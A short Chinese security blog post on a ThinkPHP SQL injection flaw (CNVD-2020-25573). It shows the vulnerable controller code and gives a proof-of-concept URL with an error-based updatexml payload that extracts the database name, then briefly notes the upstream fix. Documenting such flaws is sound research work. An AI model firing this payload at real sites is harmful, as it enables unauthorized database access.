ThinkPHP存在SQL注入漏洞(CNVD-2020-25573)

释放双眼,带上耳机,听听看~!

前言

这个洞很简单,其实就是找场景,没做过多的分析。

public function index()
    {
        $result = db('users')->where('id','in',function ($query) {
            $query->field('1')->where('id', 'in', request()->get('username/s'));
        })->select();
        print_r($result);
        return '';
    }

url

http://127.0.0.1/tpsafe/public/index.php?username=1,2,3 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

如图会造成注入

1

更新

Incorrect table name,因为是github的修复方式把connection置空了。

改进parseclosure方法

原文地址

人已赞赏
系统提权网络安全

记一次从车库到核心网段的渗透之路

2020-5-18 23:59:16

红蓝对抗网络安全

记一次sql盲注

2020-6-1 23:40:20

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索